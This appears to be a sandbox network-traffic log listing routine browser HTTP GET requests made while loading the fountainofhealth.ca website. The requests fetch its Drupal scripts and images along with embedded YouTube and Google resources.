Source: global traffic HTTP traffic detected: GET /modules/webform/js/webform.states.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /modules/webform/modules/webform_bootstrap/js/webform_bootstrap.states.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /s/player/59b252b9/www-embed-player.vflset/www-embed-player.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=xkpzWs-1UAwcookie: __Secure-ROLLOUT_TOKEN=CPOg5tKQz7TMJhCAkebnrLeNAxiAkebnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=exFbymtgdn0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgXA%3D%3Dpriority: u=1
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/popover.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/tooltip.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/displace.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/jquery.tabbable.shim.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/position.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/modal.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/dialog.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /s/player/59b252b9/player_ias.vflset/en_US/base.js HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=xkpzWs-1UAwcookie: __Secure-ROLLOUT_TOKEN=CPOg5tKQz7TMJhCAkebnrLeNAxiAkebnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=exFbymtgdn0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgXA%3D%3Dpriority: u=1
Source: global traffic HTTP traffic detected: GET /themes/bootstrap/js/modal.jquery.ui.bridge.js?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/dialog/dialog.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/misc/dialog/dialog.position.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /core/modules/ckeditor5/js/ckeditor5.dialog.fix.js?v=10.1.0 HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/Aging_featured-2.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/speakers-420.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/wellness-app.gif HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /generate_204?X6C5Ug HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/h15NcT6UXh0?si=YrXkudamh5IoggTRaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
Source: global traffic HTTP traffic detected: GET /pagead/id?slf_rd=1 HTTP/1.1host: googleads.g.doubleclick.netsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*origin: https://www.youtube.comx-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /vi_webp/gobWGqPjLSQ/hqdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /ytc/AIdro_kFvgKN3sdCZkq9BPU_-UiAQV6pGa3Qxc9oGBglVNBEEA=s68-c-k-c0x00ffffff-no-rj HTTP/1.1host: yt3.ggpht.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /themes/custom/foh/images/Testimonials/doctor-21.jpg HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/themes/custom/foh/css/style.css?swjs7bAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /generate_204?S_CoiQ HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/FURi5aHgp1g?si=Y2rCuE23jf8bkHaXaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
Source: global traffic HTTP traffic detected: GET /generate_204?HJMx7A HTTP/1.1host: www.youtube.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8x-client-data: CLf3ygE=sec-fetch-site: same-originsec-fetch-mode: no-corssec-fetch-dest: imagesec-fetch-storage-access: activereferer: https://www.youtube.com/embed/gobWGqPjLSQ?si=E-htCYBt9m3YW0wsaccept-encoding: identityaccept-language: en-US,en;q=0.9cookie: YSC=gp6ufC6NPdwcookie: __Secure-ROLLOUT_TOKEN=CLLHipfu3syhbhCrlubnrLeNAxirlubnrLeNAw%3D%3Dcookie: VISITOR_INFO1_LIVE=YyBoEXXepB0cookie: VISITOR_PRIVACY_METADATA=CgJVUxIEGgAgUA%3D%3Dpriority: i
Source: global traffic HTTP traffic detected: GET /vi_webp/h15NcT6UXh0/maxresdefault.webp HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /vi/FURi5aHgp1g/maxresdefault.jpg?sqp=-oaymwEmCIAKENAF8quKqQMa8AEB-AH-CYAC0AWKAgwIABABGH8gOChCMA8=&rs=AOn4CLCF295eNAE90ECcWgYwCgZpl6X5Wg HTTP/1.1host: i.ytimg.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*x-client-data: CLf3ygE=sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
Source: global traffic HTTP traffic detected: GET /eureka/clank/134/cast_sender.js HTTP/1.1host: www.gstatic.comsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*x-client-data: CLf3ygE=sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://www.youtube.com/accept-encoding: identityaccept-language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icons8-download-40.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/button-thoughts-e_1.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icon-E-300_6.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/icons8-up-64.png HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/foh-logo%203.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/youtube-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-11/Group%209826%20%281%29.png?itok=xYH_8dLj HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/styles/slider1/public/2023-12/Group%209825%20%282%29.png?itok=vf0UJVIa HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
Source: global traffic HTTP traffic detected: GET /sites/default/files/inline-images/facebook-t.svg HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptySec-Fetch-Storage-Access: activeAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9Cookie: _ga=GA1.1.1981881509.1747926276; _ga_WF39Z4TEVT=GS2.1.s1747926276$o1$g0$t1747926276$j0$l0$h0
